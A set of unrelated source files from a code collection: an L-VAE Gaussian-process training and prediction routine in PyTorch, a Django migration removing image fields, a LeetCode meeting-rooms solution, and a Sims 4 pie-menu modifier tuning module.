for batch_idx, sample_batched in enumerate(dataloader):
# no mini-batching. Instead get a batch of dataset size.
optimiser.zero_grad() # clear gradients
label_id = sample_batched['idx']
label = sample_batched['label']
data = sample_batched['digit']
data = data.double().to(device)
mask = sample_batched['mask']
mask = mask.to(device)
train_x = label.double().to(device)
covariates = torch.cat((train_x[:, :id_covariate], train_x[:, id_covariate+1:]), dim=1)
# encode data
recon_batch, mu, log_var = nnet_model(data)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
gp_loss_avg = torch.tensor([0.0]).to(device)
net_loss = torch.tensor([0.0]).to(device)
penalty_term = torch.tensor([0.0]).to(device)
for sample_iter in range(0, num_samples):
# Iterate over specified number of samples. Default: num_samples = 1.
Z = nnet_model.sample_latent(mu, log_var)
gp_loss = torch.tensor([0.0]).to(device)
for i in range(0, latent_dim):
Z_dim = Z[:, i].view(-1).type(torch.DoubleTensor).to(device)
if type_KL == 'closed':
# Closed-form KL divergence formula
kld1 = KL_closed(covar_module[i], train_x, likelihoods[i], data, mu[:, i], log_var[:, i])
gp_loss = gp_loss + kld1
elif type_KL == 'conj_gradient':
# GPyTorch default: use modified batch conjugate gradients
# See: https://arxiv.org/abs/1809.11165
gp_models[i].set_train_data(train_x.to(device), Z_dim.to(device))
gp_loss = gp_loss - mlls[i](gp_models[i](train_x.to(device)), Z_dim)
elif type_KL == 'GPapprox':
# Our proposed efficient approximate GP inference scheme
# See: http://arxiv.org/abs/2006.09763
loss = -elbo(covar_module0[i], covar_module1[i], likelihoods[i], train_x, Z_dim,
zt_list[i].to(device), P, T, eps)
gp_loss = gp_loss + loss
elif type_KL == 'GPapprox_closed':
# A variant of our proposed efficient approximate GP inference scheme.
# The key difference with GPapprox is the direct use of the variational mean and variance,
# instead of a sample from Z. We can call this a deviance upper bound.
# See the L-VAE supplement for more details: http://arxiv.org/abs/2006.09763
loss = deviance_upper_bound(covar_module0[i], covar_module1[i], likelihoods[i], train_x,
mu[:, i].view(-1), log_var[:, i].view(-1), zt_list[i].to(device), P,
T, eps)
gp_loss = gp_loss + loss
if type_KL == 'closed' or type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
if loss_function == 'mse':
gp_loss_avg = gp_loss_avg + (gp_loss / latent_dim)
elif loss_function == 'nll':
gp_loss_avg = gp_loss_avg + gp_loss
elif type_KL == 'conj_gradient':
if loss_function == 'mse':
gp_loss = gp_loss * data.shape[0] / latent_dim
elif loss_function == 'nll':
gp_loss = gp_loss * data.shape[0]
gp_loss_avg = gp_loss_avg + gp_loss
if type_KL == 'closed' or type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
gp_loss_avg = gp_loss_avg / num_samples
if loss_function == 'mse':
net_loss = recon_loss + weight * gp_loss_avg
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg
elif type_KL == 'conj_gradient':
gp_loss_avg = gp_loss_avg / num_samples
penalty_term = -0.5 * log_var.sum() / latent_dim
if loss_function == 'mse':
net_loss = recon_loss + weight * (gp_loss_avg + penalty_term)
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg + penalty_term
net_loss.backward()
if type_KL == 'closed' or type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss.item(), gp_loss_avg.item(), nll_loss.item(), recon_loss.item()))
elif type_KL == 'conj_gradient':
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - Penalty: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss.item(), gp_loss_avg.item(), penalty_term.item(), nll_loss.item(), recon_loss.item()))
penalty_term_arr = np.append(penalty_term_arr, penalty_term.cpu().item())
net_train_loss_arr = np.append(net_train_loss_arr, net_loss.cpu().item())
recon_loss_arr = np.append(recon_loss_arr, recon_loss.cpu().item())
nll_loss_arr = np.append(nll_loss_arr, nll_loss.cpu().item())
gp_loss_arr = np.append(gp_loss_arr, gp_loss_avg.cpu().item())
optimiser.step()
if constrain_scales:
for i in range(0, latent_dim):
likelihoods[i].noise = torch.tensor([1], dtype=torch.float).to(device)
if (not epoch % 100) and epoch != epochs:
if validation_dataset is not None:
                validate(nnet_model, type_nnet, validation_dataset, type_KL, num_samples, latent_dim, covar_module0, covar_module1, likelihoods, zt_list, T, weight, mu, train_x, id_covariate, loss_function, eps=1e-6)
if torch.cuda.is_available():
torch.cuda.empty_cache()
return penalty_term_arr, net_train_loss_arr, nll_loss_arr, recon_loss_arr, gp_loss_arr
def variational_inference_optimization(nnet_model, type_nnet, epochs, dataset, prediction_dataset, optimiser,
latent_dim, covar_module0, covar_module1, likelihoods, zt_list, P, T, Q, weight, constrain_scales,
id_covariate, loss_function, memory_dbg=False, eps=1e-6, results_path=None, save_path=None, gp_model_folder=None,
generation_dataset=None):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# set up Data Loader for training
dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=False, num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
gp_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
for batch_idx, sample_batched in enumerate(dataloader):
label_id = sample_batched['idx']
label = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
mask = sample_batched['mask'].double().to(device)
covariates = torch.cat((label[:, :id_covariate], label[:, id_covariate+1:]), dim=1)
# encode data
mu, log_var = nnet_model.encode(data)
mu = torch.nn.Parameter(mu.clone().detach(), requires_grad=True)
log_var = torch.nn.Parameter(log_var.clone().detach(), requires_grad=True)
try:
mu = torch.load(os.path.join(gp_model_folder, 'mu.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
        log_var = torch.load(os.path.join(gp_model_folder, 'log_var.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
except:
pass
optimiser.add_param_group({'params': mu})
optimiser.add_param_group({'params': log_var})
for epoch in range(1, epochs + 1):
optimiser.zero_grad()
Z = nnet_model.sample_latent(mu, log_var)
recon_batch = nnet_model.decode(Z)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
gp_loss_avg = torch.tensor([0.0]).to(device)
net_loss = torch.tensor([0.0]).to(device)
penalty_term = torch.tensor([0.0]).to(device)
for i in range(0, latent_dim):
loss = deviance_upper_bound(covar_module0[i], covar_module1[i], likelihoods[i], label,
mu[:, i].view(-1), log_var[:, i].view(-1), zt_list[i].to(device), P,
T, eps)
gp_loss_avg = gp_loss_avg + loss / latent_dim
if loss_function == 'mse':
net_loss = recon_loss + weight * gp_loss_avg
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg
net_loss.backward()
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss.item(), gp_loss_avg.item(), nll_loss.item(), recon_loss.item()),
flush=True)
penalty_term_arr = np.append(penalty_term_arr, penalty_term.cpu().item())
net_train_loss_arr = np.append(net_train_loss_arr, net_loss.cpu().item())
recon_loss_arr = np.append(recon_loss_arr, recon_loss.cpu().item())
nll_loss_arr = np.append(nll_loss_arr, nll_loss.cpu().item())
gp_loss_arr = np.append(gp_loss_arr, gp_loss_avg.cpu().item())
optimiser.step()
if not epoch % 100:
sv_pth = os.path.join(save_path, 'recon_' + str(epoch) + '.pdf')
gen_rotated_mnist_plot(data[1920:2080].cpu().detach(), recon_batch[1920:2080].cpu().detach(), label[1920:2080].cpu().detach(), seq_length=20, num_sets=8, save_file=sv_pth)
torch.save(nnet_model.state_dict(), os.path.join(save_path, 'final-vae_model.pth'))
torch.save(mu, os.path.join(save_path, 'mu.pth'))
torch.save(log_var, os.path.join(save_path, 'log_var.pth'))
for i in range(0, latent_dim):
torch.save(covar_module0[i].state_dict(), os.path.join(save_path, 'cov_module0_' + str(i) + '.pth'))
torch.save(covar_module1[i].state_dict(), os.path.join(save_path, 'cov_module1_' + str(i) + '.pth'))
prediction_dataloader = DataLoader(prediction_dataset, batch_size=len(prediction_dataset), shuffle=False, num_workers=1)
for batch_idx, sample_batched in enumerate(prediction_dataloader):
label_pred = sample_batched['label'].double().to(device)
data_pred = sample_batched['digit'].double().to(device)
mask_pred = sample_batched['mask'].double().to(device)
covariates = torch.cat((label_pred[:, :id_covariate], label_pred[:, id_covariate+1:]), dim=1)
# encode data
mu_pred, log_var_pred = nnet_model.encode(data_pred)
break
try:
mu_pred = torch.load(os.path.join(gp_model_folder, 'mu_pred.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
log_var_pred = torch.load(os.path.join(gp_model_folder, 'log_var_pred.pth'), map_location=torch.device(device)).detach().to(device).requires_grad_(True)
except:
pass
mu_pred = torch.nn.Parameter(mu_pred.clone().detach(), requires_grad=True)
log_var_pred = torch.nn.Parameter(log_var_pred.clone().detach(), requires_grad=True)
adam_param_list = []
adam_param_list.append({'params': mu_pred})
adam_param_list.append({'params': log_var_pred})
optimiser_pred = torch.optim.Adam(adam_param_list, lr=1e-3)
for epoch in range(1, 1001):
optimiser_pred.zero_grad()
Z = nnet_model.sample_latent(mu_pred, log_var_pred)
recon_batch = nnet_model.decode(Z)
[recon_loss, nll] = nnet_model.loss_function(recon_batch,
data_pred,
mask_pred)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
gp_loss_avg = torch.tensor([0.0]).to(device)
prediction_mu = torch.cat((mu_pred, mu), dim=0)
prediction_log_var = torch.cat((log_var_pred, log_var), dim=0)
prediction_x = torch.cat((label_pred, label), dim=0)
for i in range(0, latent_dim):
loss = deviance_upper_bound(covar_module0[i], covar_module1[i], likelihoods[i], prediction_x,
prediction_mu[:, i].view(-1), prediction_log_var[:, i].view(-1),
zt_list[i].to(device), P+8, T, eps)
gp_loss_avg = gp_loss_avg + loss / latent_dim
if loss_function == 'mse':
net_loss = recon_loss + weight * gp_loss_avg
elif loss_function == 'nll':
net_loss = nll_loss + gp_loss_avg
net_loss.backward()
print('Iter %d/1000 - Total Loss: %.3f - GP Loss: %.3f - Recon Loss: %.3f' % (
epoch, net_loss.item(), gp_loss_avg.item(), recon_loss.item()),
flush=True)
optimiser_pred.step()
torch.save(mu_pred, os.path.join(save_path, 'mu_pred.pth'))
torch.save(log_var_pred, os.path.join(save_path, 'log_var_pred.pth'))
l = [i*20 + k for i in range(0,8) for k in range(0,5)]
prediction_x = torch.cat((label_pred[l],
label))
prediction_mu = torch.cat((mu_pred[l],
mu))
if generation_dataset:
variational_complete_gen(generation_dataset, nnet_model, type_nnet,
results_path, covar_module0,
covar_module1, likelihoods, latent_dim,
'./data', prediction_x, prediction_mu, 'final',
zt_list, P, T, id_covariate)
exit(0)
| 2.03125
| 2
|
project/program/migrations/0012_auto_20210309_1705.py
|
ElinaSyr/tedxntua2021
| 1
|
12775647
|
<gh_stars>1-10
# Generated by Django 2.2.17 on 2021-03-09 15:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('program', '0011_auto_20210309_1703'),
]
operations = [
migrations.RemoveField(
model_name='activity',
name='image_alt',
),
migrations.RemoveField(
model_name='activity',
name='image_alt_height',
),
migrations.RemoveField(
model_name='activity',
name='image_alt_width',
),
migrations.RemoveField(
model_name='presenter',
name='image_alt',
),
migrations.RemoveField(
model_name='presenter',
name='image_alt_height',
),
migrations.RemoveField(
model_name='presenter',
name='image_alt_width',
),
]
| 1.546875
| 2
|
DS-400/Medium/253-Meeting Room II/Sort.py
|
ericchen12377/Leetcode-Algorithm-Python
| 2
|
12775648
|
<filename>DS-400/Medium/253-Meeting Room II/Sort.py
class Solution:
def minMeetingRooms(self, intervals: List[List[int]]) -> int:
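        # Sort start and end times independently; sweeping over sorted starts,
        # a meeting that begins before the earliest unfinished meeting ends
        # needs a new room, otherwise it reuses the room freed at ends[endp].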
rooms = 0
if not intervals:
return 0
endp = 0
starts = sorted([i[0] for i in intervals])
ends = sorted([i[1] for i in intervals])
for i in range(len(starts)):
if starts[i]>=ends[endp]:
endp+=1
else:
rooms+=1
return rooms
| 3.296875
| 3
|
constant/__init__.py
|
Naopil/EldenBot
| 0
|
12775649
|
from .rgapi import *
| 1.132813
| 1
|
S4/S4 Library/simulation/game_effect_modifier/pie_menu_modifier.py
|
NeonOcean/Environment
| 1
|
12775650
|
<gh_stars>1-10
from game_effect_modifier.base_game_effect_modifier import BaseGameEffectModifier
from game_effect_modifier.game_effect_type import GameEffectType
from sims4.localization import TunableLocalizedStringFactory
from sims4.tuning.tunable import OptionalTunable, HasTunableSingletonFactory, AutoFactoryInit, TunableVariant, TunableList
from snippets import TunableAffordanceFilterSnippet, TunableAffordanceListReference
from tag import TunableTags
class AffordanceFilterFactory(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'affordance_filter': TunableAffordanceFilterSnippet(description='\n Affordances this modifier affects.\n ')}
def __call__(self, affordance):
return self.affordance_filter(affordance)
class AffordanceTagFactory(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'interaction_tags': TunableTags(description='\n Affordances with any of these tags to affect.\n ', filter_prefixes=('Interaction',)), 'exceptions': TunableList(description='\n Affordances that are not affected even if they have the specified\n tags.\n ', tunable=TunableAffordanceListReference(pack_safe=True))}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
affordance_exceptions = frozenset(affordance for exception_list in self.exceptions for affordance in exception_list)
self.affordance_exceptions = affordance_exceptions or None
def __call__(self, affordance):
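        # Returning False marks the affordance as not allowed (see
        # affordance_is_allowed below): it is filtered out when it carries any
        # of the configured interaction tags and is not listed as an exception.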
if affordance.interaction_category_tags & self.interaction_tags and (self.affordance_exceptions is None or affordance not in self.affordance_exceptions):
return False
return True
class PieMenuModifier(HasTunableSingletonFactory, AutoFactoryInit, BaseGameEffectModifier):
FACTORY_TUNABLES = {'affordance_filter': TunableVariant(description='\n Affordances this modifier affects.\n ', by_affordance_filter=AffordanceFilterFactory.TunableFactory(), by_tags=AffordanceTagFactory.TunableFactory(), default='by_affordance_filter'), 'suppression_tooltip': OptionalTunable(description='\n If supplied, interactions are disabled with this tooltip.\n Otherwise, interactions are hidden.\n ', tunable=TunableLocalizedStringFactory(description='Reason of failure.'))}
def __init__(self, **kwargs):
super().__init__(GameEffectType.PIE_MENU_MODIFIER, **kwargs)
def affordance_is_allowed(self, affordance):
return self.affordance_filter(affordance)
| 2.046875
| 2
|